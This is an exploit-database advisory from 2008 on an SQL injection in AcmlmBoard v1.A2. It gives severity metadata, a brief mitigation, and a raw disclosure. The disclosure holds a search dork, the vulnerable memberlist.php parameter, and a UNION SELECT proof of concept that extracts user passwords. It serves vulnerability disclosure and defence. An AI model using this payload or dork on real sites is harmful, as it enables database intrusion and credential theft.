AcmlmBoard v1.A2 SQL Injection Vulnerability

vendor:

AcmlmBoard

by:

h0yt3r

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: AcmlmBoard

Affected Version From: v1.A2

Affected Version To: v1.A2

Patch Exists: YES

Related CWE: N/A

CPE: a:acmlmboard:acmlmboard:1.a2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

AcmlmBoard v1.A2 SQL Injection Vulnerability

This Board Software suffers from some not correctly verified variables which are used in SQL Querys. An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

######################
#
#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################

# milw0rm.com [2008-06-30]